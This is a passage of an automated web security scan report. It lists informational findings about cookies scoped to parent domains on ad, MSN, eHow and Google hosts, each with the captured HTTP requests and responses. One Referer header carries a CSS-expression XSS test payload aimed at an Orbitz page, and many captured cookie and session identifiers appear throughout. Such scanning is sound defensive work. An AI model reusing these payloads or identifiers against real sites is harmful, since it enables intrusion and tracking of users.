pubfreq_26263_21091_1958077417=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:22 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:22 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263=; domain=pubmatic.com; expires=Fri, 04-Feb-2011 15:41:22 GMT; path=/
Set-Cookie: pubtime_26263=TMC; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:22 GMT; path=/
Set-Cookie: pubfreq_26263_21091_1958077417=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:22 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:22 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1541

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...

11.232. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pubfreq_26263_21090_518704196=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:16 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263_21090_518704196=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:16 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:16 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1541

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame22624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...

11.233. http://sitelife.ehow.com/ver1.0/Direct/Process previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.ehow.com
Path:	/ver1.0/Direct/Process

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=SJL01WSITEHW12proddmlocal; domain=ehow.com; path=/
BIGipServerEhowSitelife-80=624690954.20480.0000; path=/ ; domain=ehow.com; path=/
anonId=15cddfdf-c3b2-4d8c-84fb-a4c785aba07c; domain=ehow.com; expires=Thu, 02-Feb-2012 15:41:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Direct/Process HTTP/1.1
Host: sitelife.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:41:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITEHW12proddmlocal
Set-Cookie: ASP.NET_SessionId=mnkhrvyuevpddy45sl4neoux; path=/; HttpOnly
Set-Cookie: SiteLifeHost=SJL01WSITEHW12proddmlocal; domain=ehow.com; path=/
Set-Cookie: BIGipServerEhowSitelife-80=624690954.20480.0000; path=/ ; domain=ehow.com; path=/
Set-Cookie: anonId=15cddfdf-c3b2-4d8c-84fb-a4c785aba07c; domain=ehow.com; expires=Thu, 02-Feb-2012 15:41:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 194

<script language="javascript">document.domain = "ehow.com";</script>
{"ResponseBatch":{"Messages":[{"Message":"No request submitted","MessageTime":"02/02/2011 07:41:21:464 AM"}],"Responses":[]}}

11.234. https://sitesearch.omniture.com/center/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sitesearch.omniture.com
Path:	/center/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1stsp=C92D8F8B772AFF13; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.235. http://social.entertainment.msn.com/bloglist.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.msn.com
Path:	/bloglist.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=753ef5beea254d60bfd0840e3985ef58; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=DA434B0612654AEBB69FFCCC55E457D5; domain=.entertainment.msn.com; expires=Sun, 21-Aug-2011 15:41:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bloglist.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:24 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=753ef5beea254d60bfd0840e3985ef58; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DA434B0612654AEBB69FFCCC55E457D5; domain=.entertainment.msn.com; expires=Sun, 21-Aug-2011 15:41:24 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

11.236. http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.msn.com
Path:	/movies/blogs/the-hitlist-blog.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=97142110ead246b4af23d3e80090af68; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=F3F4A38801974D0F91EB4A0695CB7A94; domain=.entertainment.msn.com; expires=Sat, 20-Aug-2011 15:37:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/the-hitlist-blog.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:41 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=97142110ead246b4af23d3e80090af68; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F3F4A38801974D0F91EB4A0695CB7A94; domain=.entertainment.msn.com; expires=Sat, 20-Aug-2011 15:37:41 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 51447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

11.237. http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.msn.com
Path:	/tv/blogs/reality-tv-blog.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=f8adf43341b7471fa5e7914cf1d7dc0a; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=6AEC06D8BAB44686824F2C0182468746; domain=.entertainment.msn.com; expires=Sat, 20-Aug-2011 15:37:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tv/blogs/reality-tv-blog.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:40 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f8adf43341b7471fa5e7914cf1d7dc0a; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=6AEC06D8BAB44686824F2C0182468746; domain=.entertainment.msn.com; expires=Sat, 20-Aug-2011 15:37:40 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 73217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

11.238. http://solutions.liveperson.com/ref/lppb.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://solutions.liveperson.com
Path:	/ref/lppb.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 02 Feb 2011 15:41:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=GFEFFOICKJDDPBENNAKBIDFF; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

11.239. http://sorry.google.com/sorry/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sorry.google.com
Path:	/sorry/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=sorry=6N0zPerLQtaqcOPwyzNvWg; path=/; domain=google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sorry/?continue=http://www.google.com/search%3Fq%3Dstatic%2B2mdn%2Bnet%26channel%3Dlinkdoctor HTTP/1.1
Host: sorry.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; SSDATA-DOMAIN=ikjREw(0:; TZ=360; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb

Response

HTTP/1.1 503 Service Unavailable
Set-Cookie: S=sorry=6N0zPerLQtaqcOPwyzNvWg; path=/; domain=google.com
Date: Wed, 02 Feb 2011 16:27:13 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: GCS/1.0
Content-Length: 2654
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title>http://www.google.com/search?q=static+2mdn+net&am
...[SNIP]...

11.240. http://sorry.google.com/sorry/Captcha previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sorry.google.com
Path:	/sorry/Captcha

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=sorry=6N0zPerLQtaqcOPwyzNvWg; path=/; domain=google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sorry/Captcha HTTP/1.1
Host: sorry.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: S=sorry=6N0zPerLQtaqcOPwyzNvWg; TZ=360; SSDATA-DOMAIN=ikjREw(0:; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 503 Service Unavailable
Set-Cookie: S=sorry=6N0zPerLQtaqcOPwyzNvWg; path=/; domain=google.com
Date: Wed, 02 Feb 2011 19:21:52 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: GCS/1.0
Content-Length: 2513
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title>http://www.google.com/</title></head>
<body style
...[SNIP]...

11.241. http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Ali-Larters-baby-story.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=ae4dd02d216846f9a2770a414b91bc69; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=DE7AAEEE18C34AB2A9596B0681A0D117; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Ali-Larters-baby-story.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:49 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ae4dd02d216846f9a2770a414b91bc69; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DE7AAEEE18C34AB2A9596B0681A0D117; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:49 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.242. http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=8b293f84a2aa4ea6b368d4335862dd47; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=30E3AF4F0D0A410F9D092D52AAF41C17; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8b293f84a2aa4ea6b368d4335862dd47; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=30E3AF4F0D0A410F9D092D52AAF41C17; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.243. http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Famous-young-fashionistas.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=c82f5ab0cb294224bb000a6974f275a5; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=C19310F2005D4F1DB8577CF5E86AD485; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Famous-young-fashionistas.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c82f5ab0cb294224bb000a6974f275a5; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C19310F2005D4F1DB8577CF5E86AD485; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:53 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.244. http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=e66a810a6966499c848c1ba70218dee0; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=137AAB2FF8D24D51B3798865AA50C5C3; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:48 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e66a810a6966499c848c1ba70218dee0; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=137AAB2FF8D24D51B3798865AA50C5C3; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:47 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.245. http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Javier-Bardem-as-Bond.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=39e0fcaec54545abb6a3f76e640dd1ae; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=F24423E8BD6D449F886E536E46A7F8AB; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Javier-Bardem-as-Bond.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=39e0fcaec54545abb6a3f76e640dd1ae; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F24423E8BD6D449F886E536E46A7F8AB; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:49 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.246. http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=c077bfedac3744318947cf51dc4f2074; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=BD3B28EF1C6441A1BC4270EEDDF93318; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c077bfedac3744318947cf51dc4f2074; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=BD3B28EF1C6441A1BC4270EEDDF93318; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.247. http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/New-Superman-chosen.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

